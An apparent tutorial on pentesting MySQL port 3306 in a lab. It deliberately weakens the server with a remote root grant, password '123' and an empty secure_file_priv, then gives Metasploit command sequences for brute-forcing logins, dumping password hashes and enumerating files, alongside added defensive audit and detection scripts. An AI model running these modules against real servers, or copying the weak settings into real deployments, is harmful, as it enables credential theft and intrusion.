In this article we will learn how to make a MySQL server vulnerable and then how to secure it, by penetration testing port 3306. To fully understand how to secure a service on a port, you have to understand how to make it vulnerable and then test it: if you do not understand what can be exploited and how, you will always fail to secure it.
Table of contents
· Introduction to MySQL-Server
· Installation of MySQL-Server
· Pentesting MySQL-Server
Introduction to MySQL-Server
The core of MySQL is the MySQL server, which handles most of the database instructions (commands). MySQL server is available as a separate program for use in a networked client-server environment, and as a library that can be embedded (linked) into separate applications. MySQL ships with a few utility programs that support the administration of MySQL databases. Commands are sent to MySQL-Server by means of the MySQL client, which is installed on a PC. The server listens on port 3306 by default.
Installation of MySQL-server
The first thing to do is to install the mysql server; to do so, use the following command:
apt install mysql-server
Then use the following command to check whether the server is up and listening:
netstat -tnl
Pentesting MySQL-Server
Scanning MySQL & Connecting to MySQL
Now, as you can see, the mysql server is working properly. But if you scan the port from another machine, it will show as closed.
nmap -p3306 192.168.1.108
The port shows as closed because, by default, the server binds only to the local address: the bind-address setting in the mysql configuration file is 127.0.0.1, so the port is reachable (and shows as open) only when you scan from that IP, as shown in the image below. Scanned from any other IP, the port appears closed even though the service is running. To change this, open the configuration file using the following command:
nano /etc/mysql/mysql.conf.d/mysqld.cnf
To change this setting, just add '#' in front of the 'bind-address' line (commenting it out), as shown in the image below:
Now if you scan it, it will show you that the port is open.
nmap -p3306 192.168.1.108
But if you then try to log in through this port, you will get an error. This happens because the mysql server does not allow the root account to connect from other IP addresses.
The error goes away once you log in to the mysql server locally and run the following commands, which grant all privileges to the root user when logging in from any IP:
GRANT ALL PRIVILEGES ON *.* TO root@'%' IDENTIFIED BY '123';
FLUSH PRIVILEGES;
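The GRANT above is exactly the kind of account an administrator should be looking for when hardening the server: a root account whose host part is the wildcard '%'. The following is an added example (not code from the article) that audits rows of the shape returned by SELECT user, host, file_priv, super_priv FROM mysql.user and proposes the narrowing statements; the rows and the pinned address 10.0.0.5 are constructed for the example. (On MySQL 8.0, where GRANT ... IDENTIFIED BY is no longer accepted, the account would instead be created with CREATE USER followed by GRANT; the audit is the same.)

```python
"""Audit MySQL account host scopes (added example; not the article's own code)."""
from dataclasses import dataclass

# Rows shaped like the output of the real query
#   SELECT user, host, file_priv, super_priv FROM mysql.user;
# The rows themselves are constructed for this example.
SAMPLE_ACCOUNTS = [
    ("root", "localhost", "Y", "Y"),
    ("root", "%", "Y", "Y"),           # what GRANT ALL ... TO root@'%' leaves behind
    ("app", "10.0.0.5", "N", "N"),
    ("report", "%", "N", "N"),
    ("backup", "192.168.1.%", "Y", "N"),
]


@dataclass
class Finding:
    user: str
    host: str
    severity: str
    reason: str


def is_wildcard_host(host: str) -> bool:
    """mysql.user.host is matched LIKE-style: '%' and '_' are wildcards,
    and an empty host means 'any host'."""
    return host == "" or "%" in host or "_" in host


def audit_accounts(rows):
    """Return findings for accounts that can connect from more than one host."""
    findings = []
    for user, host, file_priv, super_priv in rows:
        if user == "root" and host != "localhost":
            findings.append(Finding(user, host, "high",
                                    "root account reachable from a non-local host"))
            continue
        if not is_wildcard_host(host):
            continue
        if file_priv == "Y" or super_priv == "Y":
            findings.append(Finding(user, host, "high",
                                    "FILE/SUPER privilege on a wildcard-host account"))
        else:
            findings.append(Finding(user, host, "medium", "wildcard host scope"))
    return findings


def remediation_sql(rows, pinned_host="10.0.0.5"):
    """Statements that narrow each flagged account to one host.
    pinned_host is an assumed application address for the example;
    RENAME USER keeps the account's existing privileges."""
    stmts = []
    for f in audit_accounts(rows):
        if f.user == "root":
            stmts.append(f"DROP USER '{f.user}'@'{f.host}';")
        else:
            stmts.append(f"RENAME USER '{f.user}'@'{f.host}' TO '{f.user}'@'{pinned_host}';")
    return stmts


if __name__ == "__main__":
    for f in audit_accounts(SAMPLE_ACCOUNTS):
        print(f"[{f.severity}] '{f.user}'@'{f.host}': {f.reason}")
    print("\n".join(remediation_sql(SAMPLE_ACCOUNTS)))
```

The audit treats any non-localhost root account as high severity regardless of host pattern, because root carries every privilege; other wildcard accounts are rated on whether they hold FILE or SUPER, which is what the later file-enumeration modules on this page depend on.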
Now, when you try to log in, you will be successful, as shown in the image below:
Let's scan the port again to grab as many details as we can, such as its banner, MAC address, etc.
nmap -sV -p3306 192.168.1.108
MySQL Brute-Force Attack
One can also brute-force the port by using Metasploit. This module simply queries the MySQL instance for a specific user/pass combination. For this, go to the terminal in Kali, type 'msfconsole', and then use the following commands to commence the brute-force login:
use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.1.108
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt
exploit
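From the server side, a wordlist run like the one above shows up as a burst of "Access denied for user" lines in the MySQL error log, one per attempt from the same source host. The following is an added example (not code from the article) that parses such lines and raises an alert when a single host accumulates a threshold of failures inside a sliding time window; the log lines are constructed in the 5.7 error-log style and are not from a real server.

```python
"""Spot MySQL login brute-force attempts in the server error log
(added example; not the article's own code)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed error-log lines in the MySQL 5.7 style. Failed logins reach the
# error log when log_warnings >= 2 (5.7) or log_error_verbosity = 3 (5.7/8.0).
SAMPLE_LOG = """\
2024-05-01T10:00:00.000000Z 11 [Note] Access denied for user 'root'@'192.168.1.5' (using password: YES)
2024-05-01T10:00:00.200000Z 12 [Note] Access denied for user 'root'@'192.168.1.5' (using password: YES)
2024-05-01T10:00:00.400000Z 13 [Note] Access denied for user 'admin'@'192.168.1.5' (using password: YES)
2024-05-01T10:00:00.600000Z 14 [Note] Access denied for user 'root'@'192.168.1.5' (using password: YES)
2024-05-01T10:00:00.800000Z 15 [Note] Access denied for user 'root'@'192.168.1.5' (using password: YES)
2024-05-01T10:00:01.000000Z 16 [Note] Access denied for user 'root'@'192.168.1.5' (using password: YES)
2024-05-01T10:03:00.000000Z 17 [Note] Access denied for user 'app'@'10.0.0.7' (using password: YES)
2024-05-01T10:03:30.000000Z 18 [Note] Access denied for user 'app'@'10.0.0.7' (using password: YES)
"""

# Also tolerates the 8.0 layout, which inserts "[MY-nnnnnn] [Server]" tags
# between the log level and the message text.
DENIED_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+\[\w+\](?:\s+\[[^\]]+\])*\s+"
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'"
)


def parse_denials(text):
    """Return (timestamp, source host, user) for each access-denied line."""
    events = []
    for line in text.splitlines():
        m = DENIED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%fZ")
        events.append((ts, m["host"], m["user"]))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Sliding window per source host: raise one alert when `threshold`
    failures land inside `window`. Returns {host: alert details}."""
    recent = defaultdict(deque)   # host -> deque of (ts, user) still inside the window
    alerts = {}
    for ts, host, user in sorted(events):
        q = recent[host]
        q.append((ts, user))
        while ts - q[0][0] > window:   # drop entries that fell out of the window
            q.popleft()
        if len(q) >= threshold and host not in alerts:
            alerts[host] = {
                "first_alert": ts,
                "failures_in_window": len(q),
                "users_tried": sorted({u for _, u in q}),
            }
    return alerts


if __name__ == "__main__":
    for host, info in detect_bruteforce(parse_denials(SAMPLE_LOG)).items():
        print(f"{host}: {info['failures_in_window']} failures by "
              f"{info['first_alert'].isoformat()} against {info['users_tried']}")
```

Keying the window on the source host rather than on the user name matters here: the module above rotates through user_file, so a per-user counter would stay under any sensible threshold while the host as a whole is clearly enumerating accounts.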
Running SQL Queries without Logging into MySQL
This module allows simple SQL statements to be executed against a MySQL instance, given the appropriate credentials. For this, type:
use auxiliary/admin/mysql/mysql_sql
set rhosts 192.168.1.108
set username root
set password 123
set sql show databases
exploit
Extract MySQL Schemadump Information
Our next module extracts the schema information from a MySQL DB server. For this, type:
use auxiliary/scanner/mysql/mysql_schemadump
set rhosts 192.168.1.108
set username root
set password 123
exploit
Extracting Logins from MySQL-server
To extract the usernames and password hashes from a MySQL server and store them for later cracking, use the following module:
use auxiliary/scanner/mysql/mysql_hashdump
set rhosts 192.168.1.108
set username root
set password 123
exploit
Once the above module completes, you can see its result in the file it creates, as shown in the image below:
Checking Writable Directories
Another attack that can be executed against the MySQL port is to check which directories are writable. By default, this attack cannot be performed; only if the admin has made the following configuration change can an attacker check for writable directories.
nano /etc/mysql/mysql.conf.d/mysqld.cnf
Then add 'secure_file_priv=""' at the end of the file.
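Both exposures set up so far on this page live in the same file: the commented-out bind-address in the scanning section, and the empty secure_file_priv just above. The following is an added example (not code from the article) that reads the [mysqld] section of a my.cnf-style file and reports those settings, alongside local_infile, against a hardened version; both configuration fragments are constructed for the example and are not copied from any real server.

```python
"""Audit the [mysqld] section of a my.cnf-style file for network and file
exposure (added example; not the article's own code)."""

# Constructed configuration fragments, not copied from any real server.
EXPOSED_CNF = """\
[mysqld]
user            = mysql
port            = 3306
#bind-address   = 127.0.0.1
secure_file_priv=""
local_infile    = 1
"""

HARDENED_CNF = """\
[mysqld]
user             = mysql
port             = 3306
bind-address     = 127.0.0.1
secure_file_priv = /var/lib/mysql-files
local_infile     = 0
"""

_MISSING = object()   # sentinel: distinguishes "absent" from "set to empty string"


def parse_mycnf(text):
    """Minimal my.cnf reader: {section: {key: value}}. Option names are
    normalised so 'bind-address' and 'bind_address' become one key, as
    mysqld treats them; bare options (e.g. skip-networking) get ''."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;!":          # comments and !include directives
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None:
            continue
        key, _, value = line.partition("=")
        key = key.strip().replace("-", "_").lower()
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]                   # strip one layer of quotes
        sections[current][key] = value
    return sections


def audit_mysqld(text):
    """Return (option, severity, message) tuples for risky [mysqld] settings."""
    opts = parse_mycnf(text).get("mysqld", {})
    findings = []

    bind = opts.get("bind_address", _MISSING)
    if "skip_networking" not in opts and (bind is _MISSING or bind in ("0.0.0.0", "*", "::")):
        findings.append(("bind_address", "high",
                         "not restricted: mysqld accepts TCP connections on every interface"))

    sfp = opts.get("secure_file_priv", _MISSING)
    if sfp is _MISSING:
        findings.append(("secure_file_priv", "info",
                         "not set here; the effective default varies by build, confirm with SHOW VARIABLES"))
    elif sfp == "":
        findings.append(("secure_file_priv", "high",
                         "empty: LOAD_FILE / SELECT ... INTO OUTFILE may use any path the mysqld user can"))

    if opts.get("local_infile", "0").lower() in ("1", "on", "true"):
        findings.append(("local_infile", "medium",
                         "LOAD DATA LOCAL enabled; disable unless clients actually need it"))
    return findings


if __name__ == "__main__":
    for name, cnf in (("exposed", EXPOSED_CNF), ("hardened", HARDENED_CNF)):
        print(f"== {name} ==")
        for option, severity, message in audit_mysqld(cnf):
            print(f"[{severity}] {option}: {message}")
```

A commented-out bind-address is reported the same way as an explicit 0.0.0.0 or * because, with the option absent, mysqld's built-in default is to listen on all interfaces; the Debian package only restricts it through this file. The secure_file_priv check has to use a sentinel because the dangerous value is the empty string, which a plain dict.get(..., "") could not tell apart from the option being absent.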
Now, if you run the following module through Metasploit, it will enumerate writable directories using the MySQL SELECT INTO DUMPFILE feature.
use auxiliary/scanner/mysql/mysql_writable_dirs
set rhosts 192.168.1.108
set username root
set password 123
set dir_list /root/dir.txt
exploit
Enumerating Files
For further pentesting of the MySQL port, you can use the following module to enumerate files and directories using the MySQL load_file feature.
use auxiliary/scanner/mysql/mysql_file_enum
set rhosts 192.168.1.108
set username root
set password 123
set file_list /root/dir.txt
exploit
Port Transferring
Next comes port forwarding, which here means moving MySQL off its default port. This method is used in order to secure the port from attacks. For port forwarding, just open the configuration file using the following command:
nano /etc/mysql/mysql.conf.d/mysqld.cnf
And then change the port number to whichever you desire. For instance, we have used 4033 here.
After changing the port, when you scan it, it will show that the mysql service is running on the new port instead of the default one.
This is how you learn to exploit and then secure MySQL-Server.